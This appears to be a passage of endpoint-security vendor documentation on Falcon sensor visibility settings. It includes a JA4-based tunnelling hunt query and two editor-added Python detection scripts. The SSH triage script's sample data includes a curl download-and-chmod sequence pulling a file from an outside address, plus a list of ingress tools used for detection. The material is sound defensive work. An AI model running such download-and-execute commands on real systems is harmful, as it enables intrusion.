TLS            | 102               | Identify and Inspect (partial) | TLS client session establishment. Only the TLS Client Hello is inspected; no traffic decryption is performed.
SOCKS4, SOCKS5 | 104               | Identify and Inspect           | SOCKS proxy traffic. Encapsulated traffic is identified and inspected as well.
WireGuard      | 105               | Identify                       | WireGuard VPN
SSH            | 108               | Identify                       | Secure Shell
SMB            | 112               | Identify                       | File sharing
VNC, ARD       | 107               | Identify                       | Apple Remote Desktop (ARD) or VNC screen sharing
QUIC           | 103               | Identify                       | IETF QUIC (and HTTP/3) traffic
DNS            | 100               | Identify and Inspect           | Domain Name System

Related Falcon Next-Gen SIEM events

There are four Next-Gen SIEM events related to enhanced network visibility:

  • HttpRequest
  • HttpResponse
  • TlsClientHello
  • AppProtocolDetected

HttpRequest

This event contains the request type, URL, headers, and body of a plaintext HTTP request. These are the fields for this event:

Field Description
ImageFileName The full path of the requesting process
CommandLine The command line of the requesting process
DomainName The hostname, if provided by the Apple network framework
RemoteAddress[IP4|IP6] The remote IP address
RemotePort The remote port number
HttpMethod The HTTP method. Examples: GET, POST, CONNECT
HttpHost The contents of the Host header, or empty if not present
HttpPath The HTTP URI path
HttpRequestHeader A string containing the header block
HttpUserAgent The HTTP user agent header value
HttpBodyAsString The POST or PUT body in decoded form, truncated if necessary

For more event info, see HttpRequest.

HttpResponse

This event contains the response code and headers of a plaintext HTTP response. These are the fields for this event:

Field Description
ImageFileName The full path of the requesting process
CommandLine The command line of the requesting process
DomainName The hostname, if provided by the Apple network framework
RemoteAddress[IP4|IP6] The remote IP address
RemotePort The remote port number
HttpStatus The numeric HTTP status. Example: 404
HttpStatusText The status string. Example: NOT FOUND
HttpPath The HTTP URI path
HttpResponseHeader A string containing the header block

For more event info, see HttpResponse.

TlsClientHello

This event contains information derived from the TLS Client Hello that a client sends when establishing a connection. This info includes the server name indication (SNI) value, the next protocol (ALPN), and the JA3 and JA4 client fingerprints. These are the fields for this event:

Field Description
ImageFileName The full path of the requesting process
CommandLine The command line of the requesting process
DomainName The hostname, if provided by the Apple network framework
RemoteAddress[IP4|IP6] The remote IP address
RemotePort The remote port number
TlsVersion The TLS version
TlsServerName The TLS server name indication (SNI) field
Ja3ClientFingerprint The JA3 TLS client fingerprint
Ja4ClientFingerprint The JA4 TLS client fingerprint

For more event info, see TlsClientHello.

AppProtocolDetected

This event contains the application protocol in use. It supplements the host and port information provided by existing network-based telemetry, including NetworkConnect and NetworkAccept. These are the fields for this event:

Field Description
ImageFileName The full path of the requesting process
CommandLine The command line of the requesting process
DomainName The hostname, if provided by the Apple network framework
RemoteAddress[IP4|IP6] The remote IP address
RemotePort The remote port number
AppProtocol The application protocol identified

For more event info, see AppProtocolDetected.

Example: Hunting for application tunnelling

Application tunnelling is a technique used by threat actors. It has these characteristics:

  • Allows encapsulating network traffic inside other legitimate and allowed protocols
  • Blends in with other applications on the endpoint
  • Bypasses network layer defenses
  • Becomes an ingress point into environments

We need to identify a single process generating multiple, distinct JA4 fingerprints. Seeing more than one fingerprint from a process is not by itself unusual: when a client negotiates TLS with a server, the connection can be upgraded or downgraded depending on the TLS versions available, and each attempt produces a different JA4 fingerprint. That variation is confined to the first block of the fingerprint, which carries the TLS version, the SNI flag, the cipher and extension counts, and the ALPN. What we are looking for is variation in the middle and last blocks, which hash the cipher suites and the extensions plus signature algorithms offered by the client, when the fingerprints from one process are compared to each other.

Because those two blocks describe the TLS library itself rather than the individual connection, a single process presenting several of them is most likely carrying another application's network traffic, that is, tunnelling it.

This LogScale query looks for these characteristics:

  • Unsigned macOS binaries (TeamId="-")
  • Outside system directories, either user-installed or dropped by malware
  • Network connections with varying TLS fingerprints

This combination strongly suggests malware or C2 implants trying to evade network detection.

// Step 1: build a lookup table of (host, process, image) whose JA4 middle
// and last blocks each took more than one value over the last 7 days
defineTable(
query={ #event_simpleName=TlsClientHello event_platform=Mac
| splitString(by="_", as=JA4Blocks, field=TlsClientFingerprintJa4)
| groupBy([aid, ContextProcessId, ImageFileName], function=[count(field=JA4Blocks[1], as=countBlock1, distinct=true), count(field=JA4Blocks[2], as=countBlock2, distinct=true), collect(TlsClientFingerprintJa4), collect(JA4Blocks[0]), collect(JA4Blocks[1]), collect(JA4Blocks[2])])
| countBlock1 > 1
| countBlock2 > 1
| groupBy([aid, ContextProcessId, ImageFileName, CommandLine, TlsClientFingerprintJa4, JA4Blocks[0], JA4Blocks[1], JA4Blocks[2]])
}, name="multiple_ja4hashes", start=7d, include=*)
// Step 2: join those process IDs back to unsigned process executions outside system paths
| event_platform=Mac #event_simpleName="ProcessRollup2" TeamId="-"
| NOT in(field="ImageFileName", values=["/System/*", "/usr/*"])
| match(file="multiple_ja4hashes", field="TargetProcessId", column="ContextProcessId")
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| table([@timestamp, aid, GraphExplorer, TlsClientFingerprintJa4, TeamId, SigningId, CommandLine, ImageFileName], limit=20000) | sort(cid, limit=20000)

The output of this query returns processes matching your criteria with details about these items:

  • Process hierarchy
  • Command lines
  • JA4 fingerprint variations
  • Agent and endpoint information

ImageFileName is filtered to exclude the /System/ and /usr/ directories. This exclusion will likely need to be expanded after a general search has identified which processes or execution paths are valid, for processes and applications such as proxies and VPNs.
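The following Python script is an added example, not code from the original page or from CrowdStrike. It implements the JA4 construction described above, following FoxIO's public JA4 specification, from ClientHello parameters rather than from packet bytes (JA4_a from transport, TLS version, SNI, cipher and extension counts and ALPN; JA4_b from the sorted cipher suites; JA4_c from the sorted extensions plus signature algorithms), and then applies the same "more than one JA4_b and more than one JA4_c per process" test that the hunting query uses. The two ClientHello parameter sets, the process records, and the path names are constructed; no hash value is checked against a real capture.

```python
"""JA4 from ClientHello parameters, plus the per-process variance test used by the
hunting query. Editor's example following FoxIO's public JA4 spec; every hello
parameter set and process record below is constructed, not captured."""
import hashlib
from collections import defaultdict

# TLS version as it appears in JA4_a; anything else is reported as "00".
VERSION_CODES = {0x0304: "13", 0x0303: "12", 0x0302: "11",
                 0x0301: "10", 0x0300: "s3", 0x0200: "s2"}


def is_grease(value):
    """GREASE code points (RFC 8701) are 0x0a0a, 0x1a1a, ... 0xfafa and are ignored."""
    return (value & 0x0f0f) == 0x0a0a and (value >> 8) == (value & 0xff)


def ja4(ciphers, extensions, sig_algs=(), alpn=None, sni=True, versions=(),
        hello_version=0x0303, quic=False):
    """Build JA4_a '_' JA4_b '_' JA4_c from IANA code points in wire order.
    versions: contents of the supported_versions extension (highest one wins);
    hello_version: legacy ClientHello version, used when that extension is absent."""
    ciphers = [c for c in ciphers if not is_grease(c)]
    exts = [e for e in extensions if not is_grease(e)]
    offered = [v for v in versions if not is_grease(v)]
    version = VERSION_CODES.get(max(offered) if offered else hello_version, "00")
    # JA4_a: transport, version, SNI present (d) or IP (i), counts, first+last ALPN char
    ja4_a = (("q" if quic else "t") + version + ("d" if sni else "i")
             + f"{min(len(ciphers), 99):02d}{min(len(exts), 99):02d}"
             + (alpn[0] + alpn[-1] if alpn else "00"))

    def h12(text):
        return hashlib.sha256(text.encode()).hexdigest()[:12]

    # JA4_b: sorted cipher suites, so the order clients randomise does not matter
    ja4_b = h12(",".join(f"{c:04x}" for c in sorted(ciphers))) if ciphers else "0" * 12
    # JA4_c: sorted extensions minus SNI (0x0000) and ALPN (0x0010), then the signature
    # algorithms in their original order; no trailing "_" when there are none
    hashed = sorted(e for e in exts if e not in (0x0000, 0x0010))
    c_input = ",".join(f"{e:04x}" for e in hashed)
    if sig_algs:
        c_input += "_" + ",".join(f"{s:04x}" for s in sig_algs)
    ja4_c = h12(c_input) if hashed else "0" * 12
    return f"{ja4_a}_{ja4_b}_{ja4_c}"


# Constructed parameter sets standing in for two different TLS stacks.
BROWSER_STACK = dict(
    ciphers=[0x0a0a, 0x1301, 0x1302, 0x1303, 0xc02b, 0xc02f, 0xc02c, 0xc030, 0xcca9,
             0xcca8, 0xc013, 0xc014, 0x009c, 0x009d, 0x002f, 0x0035],
    extensions=[0x1a1a, 0x0000, 0x0017, 0xff01, 0x000a, 0x000b, 0x0023, 0x0010, 0x0005,
                0x000d, 0x0012, 0x0033, 0x002d, 0x002b, 0x001b, 0x4469, 0x0015, 0x2a2a],
    sig_algs=[0x0403, 0x0804, 0x0401, 0x0503, 0x0805, 0x0501, 0x0806, 0x0601],
    alpn="h2", sni=True, versions=[0x3a3a, 0x0304, 0x0303],
)
IMPLANT_STACK = dict(
    ciphers=[0x1302, 0x1303, 0x1301, 0xc02c, 0xc030, 0xc02b, 0xc02f, 0x009f, 0x009e],
    extensions=[0x0000, 0x000b, 0x000a, 0x0023, 0x0016, 0x0017, 0x000d, 0x002b, 0x002d, 0x0033],
    sig_algs=[0x0403, 0x0503, 0x0603, 0x0807, 0x0808, 0x0804, 0x0805, 0x0806, 0x0401],
    alpn=None, sni=True, versions=[0x0304, 0x0303],
)
DOWNGRADED_BROWSER = {**BROWSER_STACK, "versions": [0x0303]}  # same stack, TLS 1.2 only

# Constructed TlsClientHello records: (aid, ContextProcessId, ImageFileName, JA4)
HELLOS = [
    ("a1", 100, "/Users/alice/.cache/updater", ja4(**BROWSER_STACK)),
    ("a1", 100, "/Users/alice/.cache/updater", ja4(**IMPLANT_STACK)),
    ("a1", 200, "/Applications/Browser.app/Contents/MacOS/browser", ja4(**BROWSER_STACK)),
    ("a1", 200, "/Applications/Browser.app/Contents/MacOS/browser", ja4(**DOWNGRADED_BROWSER)),
]


def suspicious_processes(hellos):
    """Mirror the query: keep processes whose JA4_b AND JA4_c each take >1 distinct value."""
    seen = defaultdict(lambda: (set(), set()))
    for aid, pid, image, fingerprint in hellos:
        _, block_b, block_c = fingerprint.split("_")
        seen[(aid, pid, image)][0].add(block_b)
        seen[(aid, pid, image)][1].add(block_c)
    return sorted(key for key, (bs, cs) in seen.items() if len(bs) > 1 and len(cs) > 1)


if __name__ == "__main__":
    for aid, pid, image, fingerprint in HELLOS:
        print(aid, pid, image, fingerprint)
    print("flagged:", suspicious_processes(HELLOS))
```

Run as a script, it flags only pid 100, whose two hellos come from two different TLS stacks and so differ in both hashed blocks. The browser at pid 200 is not flagged: its TLS 1.3 to TLS 1.2 downgrade changes only the first block (t13 to t12), which is exactly the benign variation the text above describes and the query ignores.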

Enhance PHP Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor: Falcon sensor for Linux 7.28 or later running in User Mode.

  • Default roles: Falcon Admin

  • Supported platform: Linux

When the Enhance PHP Visibility setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor increases visibility into script activity and detects potentially malicious web shell attacks. Monitored activity includes:

  • PHP script execution

  • PHP script execution with eval() function in use

  • PHP script execution with base64_decode() function in use

The sensor produces the following events:

  • PhpExecuteScript

  • PhpEvalString

  • PhpBase64Decode

Enhance Systemd Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor: Falcon sensor for Linux 7.34 or later, running in user mode
    • This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.
  • Default roles: Falcon Admin

  • Supported platform: Linux

The Enhance Systemd Visibility setting improves monitoring and management of systemd services and timer activities by providing visibility into the creation and deletion of short-lived services and timers, as well as modifications to their properties.

Malicious actors abuse systemd primarily to establish persistence, escalate privileges, and evade defenses on Linux systems by creating, modifying, disabling, or hijacking systemd service and timer unit files. By creating or hijacking systemd services and timers that run in the system context, attackers get malicious payloads to run automatically at boot or at regular intervals with high privileges. Adversaries may use systemd in hands-on-keyboard (HOK) or living-off-the-land (LOTL) attacks.

The sensor produces the following events:

  • SystemdServicePropertiesChanged

  • SystemdTimerPropertiesChanged

PHP Script Optimization

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor: Falcon sensor for Linux 7.33 or later, running in user mode
    • This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.
  • Default roles: Falcon Admin

  • Supported platform: Linux

Hosts running high-volume PHP CMS applications such as WordPress, Pimcore, and Drupal might experience high CPU utilization after enabling the Enhance PHP Visibility prevention policy setting. You can mitigate this by enabling the PHP Script Optimization setting, which is disabled by default.

When both Enhance PHP Visibility and PHP Script Optimization are enabled, the sensor limits its reporting: instead of reporting every script execution, it reports only when a PHP script is compiled by the PHP server. This optimization is designed for environments with frequent, high-volume PHP script execution. When enabled, you should see a significant reduction in PhpExecuteScript events.

Extended User Mode Data Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor support: Falcon sensor for Windows 7.04 or later
  • Supported operating systems: Falcon-supported versions of Windows 10 and later, Windows Server 2016 and later

Important: This setting is not supported on Windows ARM64-based hosts.

Extended User Mode Data Visibility (XUMD) allows the sensor to monitor information in running processes by loading a library that can hook various user-mode APIs.

Some endpoint telemetry can be gathered only through user-mode hooking. XUMD reports which APIs a process is calling, and that information feeds a variety of prevention mechanisms available to the sensor, based on the behavior accumulated over time.

Unlike Additional User Mode Data Visibility (AUMD), the cloud can dynamically modify XUMD visibility without a sensor update.

Supported prevention policy settings for XUMD:

  • Disabled: The extended visibility, detection, and prevention capabilities of XUMD are disabled. The hooking library is not loaded into processes.

  • Cautious: XUMD is enabled with high-confidence hooks that are accessible to detection and prevention logic. Performance and compatibility impact at this setting is expected to be negligible, but we recommend testing this setting in a staging environment before deploying it to production.

  • Moderate: XUMD is enabled with high- and medium-confidence hooks that are accessible to detection and prevention logic. This setting provides expanded visibility and can result in performance or application-compatibility impact; the performance impact is still expected to be negligible, but we recommend testing this setting in a staging environment before deploying it to production.

  • Aggressive: XUMD is enabled with high-, medium-, and low-confidence hooks that are accessible to detection and prevention logic. This setting can result in significant performance or application-compatibility problems. This setting is not recommended for production environments without significant prior testing in a staging environment.

  • Extra Aggressive: XUMD is enabled with high-, medium-, low-, and experimental-confidence hooks that are accessible to detection and prevention logic. This setting can result in significant performance problems or application compatibility problems. This setting is not recommended for any production environment but might be appropriate for penetration and stress testing in specific limited deployments.

Because XUMD is loaded in user processes that were not developed with it, negative interactions with other software might occur. This is most common when other security products are installed. In certain software environments, conflicting software might crash, fail to start, or suffer degraded performance. In these scenarios, move a test system into a policy where XUMD is disabled, reboot the host, and then retry the software. If the issue is resolved, open a Support case and request assistance in resolving the conflict. Support can assist in diagnosing and resolving these issues between XUMD and specific software.

To determine which processes have loaded the XUMD DLL, run the following command at the command line:

tasklist /m csxumd*

Environment Variable Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor support: Falcon sensor for Linux 7.30 or later running in User Mode

    • This setting is only supported on sensors running in user mode. Sensors running in kernel mode (KM) do not support this setting, and enabling it on hosts running in KM has no effect.

  • Default roles: Falcon Admin

  • CrowdStrike clouds: Available in all clouds

The Environment Variable Visibility prevention policy setting lets the sensor attach uprobes (user-space dynamic tracing probes) so that the existing environment variable visibility extends into user-space hooks.

When the Environment Variable Visibility setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor for Linux increases visibility into changes made to process environment variables.

When this setting is enabled, the sensor does the following:

  • Tracks empty process environment variables

  • Identifies when environment variable state is cleared

  • Monitors and detects changes to process environment variables

This prevention policy produces the CriticalEnvironmentVariableChanged and the ProcessEnvironmentEmpty sensor events.

Filesystem Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 6.37 and later

The Filesystem Visibility setting allows the sensor to monitor file system activity for additional telemetry and improved detections.

Tip: This setting increases the number of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.
Monitored Filesystem Event Types
Important: With Falcon for Linux on IBM zSystems, the Falcon sensor doesn’t support file system events.
Executable:
  • ELFFileWritten
  • MachOFileWritten
  • NewExecutableWritten
  • NewScriptWritten
  • PeFileWritten
Document:
  • MSDocxFileWritten
  • MSPptxFileWritten
  • MSVsdxFileWritten
  • MSXlsxFileWritten
  • OleFileWritten
  • OoxmlFileWritten
  • PdfFileWritten
  • RtfFileWritten
Archive:
  • ArcFileWritten
  • BZip2FileWritten
  • CabFileWritten
  • GzipFileWritten
  • JarFileWritten
  • JavaClassWritten
  • RarFileWritten
  • SevenZipFileWritten
  • TarFileWritten
  • XarFileWritten
  • ZipFileWritten
Dump:
  • DmpFileWritten
Image:
  • BmpFileWritten
  • GifFileWritten
  • JpegFileWritten
  • PngFileWritten
  • TiffFileWritten
Network file systems

These file systems are treated as network file systems:

  • CIFS

  • NFS

Excluded file systems

The sensor monitors regular files and directories only.

These file systems are skipped:

  • binfmtfs

  • cgroup

  • cgroup2

  • configfs

  • debugfs

  • devpts

  • efivarfs

  • futexfs

  • hugetlbfs

  • mqueue

  • pipefs

  • proc

  • pstorefs

  • securityfs

  • selinux

  • smack

  • sockfs

  • sysfs

  • tracefs

FTP Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 6.48 and later

Enable the FTP Visibility prevention policy setting on the Falcon sensor to monitor unencrypted FTP traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Tip: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.
Hardware-Enhanced Exploit Detection

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Hardware-Enhanced Exploit Detection leverages underlying hardware acceleration and security enhancement capabilities to improve hardware-assisted Control Flow Integrity (CFI) validation and exploit detection. This enhancement improves detection for sophisticated exploits that might otherwise evade standard CFI validation using kernel operations.

Supported on hosts running Windows 10 v1809 and later, Server 2016 v1803 and later, Server 2019, and Server 2022. Supported on Intel Skylake or later and Goldmont or later CPUs; not supported on AMD processors. Not supported in virtual environments; the feature is disabled on virtual hosts.

Important: Unsupported hosts aren’t affected by this policy.
HTTP Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 6.48 and later

Enable the HTTP Visibility prevention policy setting on the Falcon sensor to monitor unencrypted HTTP traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Note: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization. Depending on the role of the host, such as a web server with HTTP Visibility enabled, you could also see an increase in CPU utilization.
HTTP Visibility and Detection

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported operating systems: Windows 7, Windows 8.1, Windows 10, Windows 11

    • Not Supported: Windows Server OS

Important: This feature doesn't activate on Windows Server OS. It activates on supported workstation versions of Windows 7, Windows 8.1, Windows 10, and Windows 11 only.

This setting allows the sensor to monitor unencrypted HTTP traffic and certain encrypted HTTPS (WinINet) traffic looking for known malicious patterns. The sensor uses the Windows Filtering Platform (WFP) and Event Tracing for Windows (ETW) to monitor URLs, content encoding, languages, user agents, and HTTP methods visible using the HTTP header of the connection. When information matches known malicious IOAs, the sensor generates detection and/or prevention events. When a detection occurs, all collected data is rolled up into an event that is sent to the cloud. Traffic that doesn't match an IOA never leaves the host.

HTTP and WinINet HTTPS are commonly used by malware for command and control or for exfiltration attempts.

If Redacted HTTP Detection Details is enabled, privacy sensitive data is redacted prior to being sent to the cloud.

Interpreter-Only Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Interpreter-Only Visibility provides AMSI-based and AMSI-emulation-based introspection of the PowerShell engine and helps identify malicious script or command usage. On non-AMSI-capable hosts it provides introspection of the PowerShell engine using DLL injection. This setting must be enabled to leverage the System Management Engine Visibility policy option, and it is also a prerequisite for the associated prevention feature Suspicious Scripts and Commands found in the Execution Blocking category.

Memory Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 7.21 and later

When enabled, the Memory Visibility prevention policy setting increases visibility into the following:

  • Process memory maps associated with a process, including existing processes that were initiated before this setting was enabled.

    • Visibility into these memory maps can help identify instances where Return Oriented Programming (ROP) based exploits have been executed and reveal malicious software running shellcode from memory.

  • The various system calls needed to detect process injection.

    • Increased visibility into system calls can help with detecting malicious software that injects itself into other processes.

  • Any shared objects being loaded into a process.

    • This can help with detecting shared object sideloading or identifying shared objects that are embedded backdoors, such as the xz backdoor.

Network Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 6.37 and later

The Network Visibility setting controls the Falcon sensor’s ability to monitor network activity for additional telemetry and improved detections.

Tip: This setting increases the number of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization.
Network events supported on Linux
Important: With Falcon for Linux on IBM zSystems, support for network events requires Falcon Sensor for Linux version 6.53.15003 or later.
Network Events:
  • RawBindIP4
  • RawBindIP6
  • NetworkConnectIP4
  • NetworkReceiveAcceptIP4
  • NetworkListenIP4
  • NetworkConnectIP6
  • NetworkReceiveAcceptIP6
  • NetworkListenIP6
  • DnsRequest
  • SuspiciousDnsRequest
Other network events:
  • NetworkCloseIP4
  • NetworkCloseIP6
Redacted HTTP Detection Details

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported operating systems: Windows 7, Windows 8.1, Windows 10, Windows 11

    • Not Supported: Windows Server OS

Important: This feature doesn't activate on Windows Server OS. It activates on supported workstation versions of Windows 7, Windows 8.1, Windows 10, and Windows 11 only.

If this setting is enabled, certain privacy-sensitive information from HTTP Detection events, including URL, raw HTTP header and POST bodies (if present) are redacted prior to the data being sent to the cloud. This doesn't affect the generation of HTTP Detections but eliminates additional details that would otherwise be included, details which may include personal information depending on the malware in question.

Redacting detection details may adversely impact your threat hunting capabilities. The redacted data cannot be recovered. When this setting is disabled and the additional details are provided, the information is used to improve the response to detection events.

Script-Based Execution Visibility

Requirements:

  • Subscriptions:
    • For Windows: Falcon Prevent
    • For Mac and Linux: Falcon Insight XDR or Falcon Prevent
  • Supported platforms: Windows, Mac, Linux

  • Sensor support:

    • All supported versions of Falcon sensor for Windows and Mac

    • Falcon sensor for Linux 6.32 and later

    • Falcon Container sensor for Linux 7.35 and later

Important: For ARM64-based hosts running Windows 11, you must have Falcon sensor for Windows version 6.56 or later. This setting is not supported for ARM64-based hosts running Windows 10.

Turn on the Script-Based Execution Visibility prevention policy setting to enable the Falcon sensor to monitor the contents of scripts and shells that are popular mechanisms for executing malicious code on hosts. This setting doesn't kill or block scripts.

Windows visibility:

Script-Based Execution Visibility provides AMSI-based inspection of the PowerShell engine and several scripting languages. It helps identify malicious script or command usage on Windows 10 and 11-based hosts and on Server 2016, 2019, and 2022-based hosts. Like Engine Full Visibility, it also intercepts execution of PowerShell scripts and commands from any application using the PowerShell engine, but it does so using AMSI. If an executed PowerShell script generates a detection, you can view any interactive commands used in the Process Operation area of the detection.

When Script-Based Execution Visibility is enabled, the Falcon sensor acts as a registered AMSI anti-malware provider. It evaluates VBA scripts run from Microsoft Office applications and, if it does not deem a macro malicious, allows it to run. Learn more about AMSI at Microsoft Windows Dev Center.

Important: Quarantine & Security Center Registration must be enabled to use Script-Based Execution Visibility. This setting quarantines PowerShell script files that are found to be malicious.
  • Scripting languages:

    • Excel 4.0 macros

    • JScript

    • VBA Macros

    • VBScript

  • Shells:

    • PowerShell

Mac visibility:

  • Scripting languages:

    • Applescript

    • JavaScript

    • Perl

    • PHP

    • Python

    • Ruby

  • Shells:

    • bash

    • csh

    • ksh

    • sh

Linux visibility:

  • Scripting languages:

    • Groovy

    • JavaScript (node.js)

    • Lua

    • Perl

    • PHP

    • Pwsh

    • Python

    • Ruby

  • Shells:

    • ash

    • bash

    • csh

    • dash

    • ksh

    • sh

    • tcsh

    • zsh

SSH Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor support: Falcon sensor for Linux 7.31 or later, running in user mode

    • This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.

  • Default roles: Falcon Administrator

  • Supported platform: Linux

The SSH Visibility prevention policy setting provides a comprehensive view of authenticated SSH connections and the actions performed during an SSH session. When the SSH Visibility prevention policy setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor for Linux improves visibility into connections accepted by all SSH daemons and services.

When this setting is enabled, the sensor does the following:

  • Traces authenticated SSH connections, including file transfer sessions, with full IPv4/IPv6 connection information.

  • Extracts public key information (in SHA-256 hash format) that is sent to servers for authentication.

  • Provides indicators of compromise by fingerprinting clients on the basis of client version, public keys, and internal algorithms. This feature also tracks server versions.

  • Links each SSH session to all the commands executed through that connection using the SSHSessionId.

This prevention policy produces a new SSHClientAuthenticated event. Additionally, ProcessRollup2 events contain an SSHSessionId field when they originate from a traced SSH connection. This field can be used to link back to an SSHClientAuthenticated event.

The enhanced telemetry from this setting improves the detection and prevention of malicious attacks, including MITRE tactics and techniques such as Lateral Movement, Command and Control, and Ingress Tool Transfer.
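The following Python script is an added example by the editor, not CrowdStrike code, showing how the SSHSessionId linkage described above is used in practice: it joins ProcessRollup2 events back to the SSHClientAuthenticated event they descend from, rebuilds each session's command timeline, and triages sessions by client key and by ingress-tool usage. Only SSHSessionId is named on the page; UserName, RemoteAddressIP4, ClientPublicKeySha256 and ClientVersion are assumed field names, and every record, fingerprint and address below is constructed.

```python
"""Rebuild SSH sessions from SSH Visibility telemetry and triage them.
Editor's example, not CrowdStrike code. Only SSHSessionId is documented;
UserName, RemoteAddressIP4, ClientPublicKeySha256 and ClientVersion are
assumed field names, and every record here is constructed."""

# Constructed SSHClientAuthenticated events, one per accepted connection.
AUTH_EVENTS = [
    {"SSHSessionId": "sess-1", "UserName": "deploy", "RemoteAddressIP4": "10.0.5.20",
     "ClientPublicKeySha256": "SHA256:deployKeyFp000000000000000000000000000000000",
     "ClientVersion": "SSH-2.0-OpenSSH_9.6"},
    {"SSHSessionId": "sess-2", "UserName": "root", "RemoteAddressIP4": "203.0.113.7",
     "ClientPublicKeySha256": "SHA256:unknownKeyFp00000000000000000000000000000000",
     "ClientVersion": "SSH-2.0-libssh_0.9.6"},
]

# Constructed ProcessRollup2 events. SSHSessionId is only present on processes
# that descend from a traced SSH connection; the cron job has none.
PROCESS_EVENTS = [
    {"@timestamp": 1, "SSHSessionId": "sess-1", "CommandLine": "git pull"},
    {"@timestamp": 2, "SSHSessionId": "sess-1", "CommandLine": "systemctl restart app"},
    {"@timestamp": 3, "SSHSessionId": "sess-2", "CommandLine": "curl -s http://203.0.113.7/x -o /tmp/x"},
    {"@timestamp": 4, "SSHSessionId": "sess-2", "CommandLine": "chmod +x /tmp/x"},
    {"@timestamp": 5, "CommandLine": "/usr/sbin/cron"},
]

# Key fingerprints you expect to see, e.g. exported from an authorized_keys inventory.
KNOWN_KEYS = {"SHA256:deployKeyFp000000000000000000000000000000000"}

# Command prefixes that move tooling onto the host over the session.
INGRESS_TOOLS = ("curl ", "wget ", "scp ", "sftp ")


def build_sessions(auth_events, process_events):
    """Return {SSHSessionId: auth fields + ordered list of commands run in it}."""
    sessions = {e["SSHSessionId"]: {**e, "commands": []} for e in auth_events}
    for proc in sorted(process_events, key=lambda p: p["@timestamp"]):
        session = sessions.get(proc.get("SSHSessionId"))
        if session is not None:
            session["commands"].append(proc["CommandLine"])
    return sessions


def triage(sessions, known_keys=KNOWN_KEYS):
    """Flag sessions opened with a key outside the inventory, or whose commands
    include an ingress tool (the Ingress Tool Transfer technique named above)."""
    findings = []
    for sid, s in sessions.items():
        reasons = []
        if s["ClientPublicKeySha256"] not in known_keys:
            reasons.append("unknown client key")
        if any(cmd.startswith(INGRESS_TOOLS) for cmd in s["commands"]):
            reasons.append("ingress tool transfer")
        if reasons:
            findings.append((sid, s["UserName"], s["RemoteAddressIP4"], reasons))
    return findings


if __name__ == "__main__":
    sessions = build_sessions(AUTH_EVENTS, PROCESS_EVENTS)
    for sid, s in sessions.items():
        print(sid, s["UserName"], s["RemoteAddressIP4"], s["ClientVersion"], s["commands"])
    print("findings:", triage(sessions))
```

Run as a script, it reports sess-2 only: the root login from 203.0.113.7 used a key that is not in the inventory and then pulled a file down with curl. The cron process, which has no SSHSessionId, is left out of every session, which is the behaviour to expect from the field's presence being tied to SSH lineage.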

System Management Engine Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Where the Interpreter-Only Visibility policy option gives visibility into the built-in PowerShell interpreter applications, System Management Engine Visibility uses DLL injection to intercept execution of PowerShell scripts and commands from any application that hosts the PowerShell engine. This feature inspects at the scripting engine level for the most prolific Windows scripting languages.

TLS Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 6.49 and later

Enable the TLS Visibility prevention policy setting on the Falcon sensor to monitor encrypted TLS traffic for malicious patterns. This setting provides additional context for telemetry and improved detections.

Note: This setting will increase the quantity of events generated. If you forward event data to local storage instances, test this setting before enabling it widely across your organization. Depending on the role of the host, such as a web server with TLS Visibility enabled, you could also see an increase in CPU utilization.
WSL 2 Visibility

Requirements:

  • Subscription: Falcon Prevent or Falcon Insight XDR

  • Sensor: Falcon sensor for Windows 7.26 or later

  • Default roles:

    • Can configure prevention policies:

      • Falcon Administrator

      • Prevention Policy Manager

  • CrowdStrike clouds: Available in all clouds

  • Additional system requirements: 64-bit x86-64 versions of Windows that support WSL 2 and are supported for use with the Falcon sensor for Windows. For more info, see Supported operating systems.

